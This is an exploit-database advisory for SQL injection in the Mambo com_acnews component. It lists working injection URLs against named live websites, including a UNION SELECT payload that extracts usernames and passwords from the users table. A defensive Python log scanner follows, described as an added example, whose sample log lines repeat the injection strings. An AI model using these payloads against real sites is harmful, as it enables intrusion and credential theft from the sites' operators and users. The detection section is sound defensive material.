Mambo Component com_acnews [id] SQL Injection

2010-02-16T00:00:00
ID 1337DAY-ID-10924
Type zdt
Reporter Zero Bits
Modified 2010-02-16T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
=============================================
Mambo Component com_acnews [id] SQL Injection
=============================================

Author: Zero Bits & Xzit3
Team: Ro0T-MaFia
Members: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx
Date: 15/02/2010

Country: Venezuela - Mexico
############################

Vulnerabilities:

[+] SQL Injection:
Error: You have an error in your SQL syntax.


BUG: index.php?lang=en&option=com_acnews&task=view&id=188(SQLi)


Real example: 

http://www.artcom.net/index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)

http://www.artcom.de/index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0


http://www.artcommedia.com/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--
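
For detection, the requests above share one trait: a parameter that should be an integer (id, Itemid, page) carries a quote or SQL keywords. The following Python check is an added example, not part of the original advisory: it flags com_acnews requests in web-server access logs whose numeric parameters are not plain integers. The log lines, the NUMERIC_PARAMS list and the function names are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: parameters the component treats as integers, taken from the
# URLs shown in the advisory (id, Itemid, page).
NUMERIC_PARAMS = ("id", "Itemid", "page")
INT_RE = re.compile(r"-?\d+")  # applied with fullmatch()
# Request line of a Common Log Format entry: "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_params(target):
    """Return {param: decoded value} for non-integer numeric parameters
    of a com_acnews request; empty dict if the request looks clean."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_acnews" not in query.get("option", []):
        return {}
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):  # parse_qs already URL-decodes
            if not INT_RE.fullmatch(value):
                bad[name] = value
    return bad


def scan(lines):
    """Yield (client_ip, findings) for each flagged access-log line."""
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        findings = suspicious_params(m.group(1))
        if findings:
            yield line.split(" ", 1)[0], findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Feb/2010:10:00:01 +0000] "GET /index.php?lang=en&option=com_acnews&task=view&id=188&page=0 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Feb/2010:10:00:05 +0000] "GET /index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0 HTTP/1.1" 200 812',
    '198.51.100.7 - - [15/Feb/2010:10:00:09 +0000] "GET /index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,3-- HTTP/1.1" 200 4096',
    '203.0.113.4 - - [15/Feb/2010:10:00:12 +0000] "GET /index.php?option=com_content&id=7%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE_LOG):
        print(ip, findings)
```

A hit here is a detection signal only; the fix belongs in the component, by casting these parameters to integers or binding them in parameterized queries.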


###########################



#  0day.today [2018-01-08]  #